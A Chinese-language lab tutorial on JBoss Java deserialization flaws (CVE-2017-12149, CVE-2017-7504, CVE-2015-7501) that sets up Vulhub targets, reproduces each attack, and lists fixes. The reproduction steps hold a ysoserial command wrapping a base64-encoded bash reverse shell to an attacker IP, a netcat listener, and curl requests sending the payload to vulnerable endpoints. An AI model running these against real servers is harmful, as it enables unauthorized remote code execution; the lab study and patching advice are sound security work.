JBOSS反序列化漏洞解析与防范策略

引言

JBOSS是一个流行的开源应用服务器，广泛应用于企业级应用程序的开发和部署。然而，由于其广泛的使用和复杂的架构，JBOSS也成为了黑客攻击的常见目标。近年来，多个JBOSS漏洞被曝光，这些漏洞允许攻击者远程执行任意代码、窃取数据或导致服务中断，对企业和用户的信息安全构成了严重威胁。因此，理解和防范JBOSS漏洞成为了网络安全领域的重要课题。

JBOSS反序列化漏洞是近年来网络安全领域中的一个热点问题。反序列化是将序列化数据还原为对象的过程，而在JBOSS中，由于对输入数据的反序列化处理不当，攻击者可以利用这一过程注入恶意代码，从而实现远程代码执行、数据泄露等攻击。这种漏洞的存在，不仅威胁到JBOSS服务器本身的安全，还可能影响到使用JBOSS的应用程序和其背后的整个企业系统。因此，深入理解JBOSS反序列化漏洞的原理及其防范策略，对于保障网络安全具有重要意义。

原理

JBOSS反序列化漏洞的原理主要涉及到Java序列化机制。在Java中，序列化是将对象转换为字节流的过程，以便于存储或传输。反序列化则是将字节流重新转换为对象的过程。当JBOSS服务器接收到来自客户端的序列化数据时，它会尝试将这些数据反序列化为对象。如果攻击者精心构造了这些序列化数据，使其在反序列化过程中执行恶意代码，那么就可以实现远程代码执行等攻击。

环境搭建

介绍

Vulhub，由资深安全专家打造的开源漏洞靶场环境，已成为网络安全研究和测试的得力助手。它基于Docker和Docker Compose，为安全研究人员提供了一个快速、便捷的方式来搭建、使用和分享各种漏洞环境。

Vulhub的创建旨在简化漏洞测试流程，提供一个标准的测试平台，让安全研究更加高效和系统化。通过Vulhub，研究人员可以快速部署漏洞场景，进行深入研究，而无需担心对实际生产环境的影响。

对于网络安全爱好者来说，学习如何搭建Vulhub是提升技能的必经之路。这不仅涉及Docker和Docker Compose的技术应用，也是理解漏洞测试基本流程的实践机会。

搭建步骤

环境准备

Ubuntu虚拟机（其他Linux虚拟机也可以）、docker、docker-compose

下载vulhub（记得Star）

下载地址：vulhub/vulhub：基于 Docker-Compose 的预构建脆弱环境 — vulhub/vulhub: Pre-Built Vulnerable Environments Based on Docker-Compose

上传至虚拟机

使用XFTP或者使用VMware提供的复制粘贴功能粘贴到虚拟机并解压，推荐放到桌面，方便管理

工具下载

下载地址：frohoff/ysosarial：一个概念验证工具，用于生成利用不安全 Java 对象私有化的有效负载。 — frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
java环境推荐1.8（亲测有效）

CVE-2017-12149

漏洞描述

CVE-2017-12149漏洞是一个反序列化远程代码执行漏洞，存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。攻击者可以通过构造恶意序列化数据，在未经身份验证的情况下在服务器上执行任意代码，从而控制服务器

影响范围

该漏洞影响以下版本的JBoss应用服务器：

• JBoss 5.x版本
• JBoss 6.x版本

漏洞原理

JBoss应用服务器在处理来自客户端的序列化数据时，没有进行适当的安全检查和限制，导致攻击者可以利用精心设计的序列化数据执行任意代码。具体来说，漏洞出现在/invoker/readonly路径下，服务器将用户提交的POST内容进行了Java反序列化1247

环境搭建

1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-12149/
2. 开启环境docker-compose up -d
3. 使用docker ps查看正在运行的容器，可以看到端口号为8080
4. 使用浏览器访问
   

攻击复现

1. 使用浏览器访问192.168.35.128:8080/invoker/readonly，出现如下界面
   

2. 监听端口

   # linux下使用
   nc -lvp 8888
   # windows下可以使用nmap工具的监听端口功能
   ncat -lvp 8888
   

3. 进入到到工具目录

   java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" >poc.ser
   

   YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjM1LjEvODg4OCAwPiYx为计划任务反弹Shellbash -i >& /dev/tcp/192.168.35.1/8888 0>&1的base64加密值，将其中的IP地址（攻击机IP地址）和监听端口改为自己需要的，在进行base64加密，ysoserial-all.jar为自己的工具文件名

   curl http://192.168.35.128:8080/invoker/readonly --data-binary @poc.ser
   

   使用 curl 工具向指定的http://192.168.35.128:8080/invoker/readonly发送一个 POST 请求，其中包含了名为 poc.ser 的文件内容作为请求体。

4. 成功反弹Shell
   

修复方案

针对CVE-2017-12149漏洞，修复方案包括：

1. 升级JBoss版本：升级到不受影响的JBoss版本（例如，JBoss 7.x版本）。
2. 删除不必要的组件：如果不需要http-invoker.sar组件，可以直接删除该组件。
3. 添加安全控制：在http-invoker.sar下web.xml的security-constraint标签中添加访问控制，限制对http invoker组件的访问

CVE-2017-7504

漏洞描述

CVE-2017-7504漏洞存在于JBoss AS 4.x及之前版本的JbossMQ组件中。具体来说，漏洞位于HTTPServerILServlet.java文件，该文件在处理反序列化数据时没有进行适当的安全检查，导致攻击者可以借助特制的序列化数据执行任意代码

影响范围

该漏洞影响JBoss AS 4.x及之前版本

环境搭建

使用vulhub靶场，搭建教程vulhub搭建教程

1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/CVE-2017-7504/
2. 开启环境docker-compose up -d
3. 使用docker ps查看正在运行的容器，可以看到端口号为8080
4. 使用浏览器访问
   

攻击复现

1. 使用浏览器访问192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet，出现如下界面
   

2. 其他步骤与CVE-2017-12149相同，只有最后请求的网址变了

   curl http://192.168.35.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
   

修复建议

1. 升级版本：升级到不受该漏洞影响的JBoss版本。
2. 禁用相关服务：如果不需要JBossMQ服务，可以禁用该服务以避免漏洞利用。
3. 修改配置：在服务器配置中限制对敏感路径的访问，例如修改jboss-web.deployer/server.xml中的绑定地址

JMXInvokerServlet-deserialization（CVE-2015-7501）

漏洞描述

JBoss在处理 /invoker/JMXInvokerServlet 请求时，会读取用户传入的对象并进行反序列化。攻击者可以利用Apache Commons Collections中的Gadget来执行任意代码

影响范围

该漏洞影响以下版本的JBoss产品：

• JBoss Enterprise Application Platform 6.4.4, 5.2.0, 4.3.0 CP10
• JBoss AS (Wildly) 6及之前版本
• JBoss A-MQ 6.2.0
• JBoss Fuse 6.2.0
• JBoss SOA Platform (SOA-P) 5.3.1
• JBoss Data Grid (JDG) 6.5.0
• JBoss BRMS (BRMS) 6.1.0
• JBoss BPMS (BPMS) 6.1.0
• JBoss Data Virtualization (JDV) 6.1.0
• JBoss Fuse Service Works (FSW) 6.0.0
• JBoss Enterprise Web Server (EWS) 2.1, 3.0

环境搭建

使用vulhub靶场，搭建教程vulhub搭建教程

1. 进入靶场环境文件夹 cd Desktop/vulhub-master/jboss/JMXInvokerServlet-deserialization/
2. 开启环境docker-compose up -d
3. 使用docker ps查看正在运行的容器，可以看到端口号为8080
4. 使用浏览器访问
   

攻击复现

1. 使用浏览器访问192.168.35.128:8080/invoker/JMXInvokerServlet，下载了文件，说明漏洞存在

2. 其他步骤与CVE-2017-12149相同，只有最后请求的网址变了

   curl http://192.168.35.128:8080/invoker/JMXInvokerServlet --data-binary @poc.ser
   

修复建议

1. 更新版本：升级到不受该漏洞影响的JBoss版本。
2. 禁用相关服务：如果不需要JBossMQ服务，可以禁用该服务以避免漏洞利用。
3. 修改配置：在服务器配置中限制对敏感路径的访问。例如，修改 jboss-web.deployer/server.xml 中的绑定地址。
4. 使用安全库：更新Apache Commons Collections库，并使用SerialKiller来控制反序列化的可信类型

---

参考文章：

JBoss反序列化漏洞复现_cve-2017-7504-CSDN博客